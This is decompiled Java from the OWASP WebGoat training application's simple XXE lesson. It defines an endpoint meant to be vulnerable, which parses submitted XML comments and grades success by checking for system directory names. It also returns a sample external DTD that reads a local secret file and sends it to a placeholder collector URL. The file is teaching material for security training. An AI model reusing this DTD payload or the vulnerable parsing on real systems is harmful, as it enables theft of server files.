/*
 * Decompiled with CFR 0.152.
 */
package org.owasp.webgoat.lessons.xxe;

import org.apache.commons.exec.OS;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.exception.ExceptionUtils;
import org.owasp.webgoat.container.CurrentUser;
import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
import org.owasp.webgoat.container.assignments.AssignmentHints;
import org.owasp.webgoat.container.assignments.AttackResult;
import org.owasp.webgoat.container.assignments.AttackResultBuilder;
import org.owasp.webgoat.container.users.WebGoatUser;
import org.owasp.webgoat.lessons.xxe.Comment;
import org.owasp.webgoat.lessons.xxe.CommentsCache;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
@AssignmentHints(value={"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
public class SimpleXXE
implements AssignmentEndpoint {
    private static final String[] DEFAULT_LINUX_DIRECTORIES = new String[]{"usr", "etc", "var"};
    private static final String[] DEFAULT_WINDOWS_DIRECTORIES = new String[]{"Windows", "Program Files (x86)", "Program Files", "pagefile.sys"};
    private final CommentsCache comments;

    public SimpleXXE(CommentsCache comments) {
        this.comments = comments;
    }

    @PostMapping(path={"xxe/simple"}, consumes={"*/*"}, produces={"application/json"})
    @ResponseBody
    public AttackResult createNewComment(@RequestBody String commentStr, @CurrentUser WebGoatUser user) {
        String error = "";
        try {
            Comment comment = this.comments.parseXml(commentStr, false);
            this.comments.addComment(comment, user, false);
            if (this.checkSolution(comment)) {
                return AttackResultBuilder.success((AssignmentEndpoint)this).build();
            }
        }
        catch (Exception e) {
            error = ExceptionUtils.getStackTrace((Throwable)e);
        }
        return AttackResultBuilder.failed((AssignmentEndpoint)this).output(error).build();
    }

    private boolean checkSolution(Comment comment) {
        String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
        boolean success = false;
        for (String directory : directoriesToCheck) {
            success |= StringUtils.contains((CharSequence)comment.getText(), (CharSequence)directory);
        }
        return success;
    }

    @RequestMapping(path={"/xxe/sampledtd"}, consumes={"*/*"}, produces={"text/plain"})
    @ResponseBody
    public String getSampleDTDFile() {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n%all;\n";
    }
}

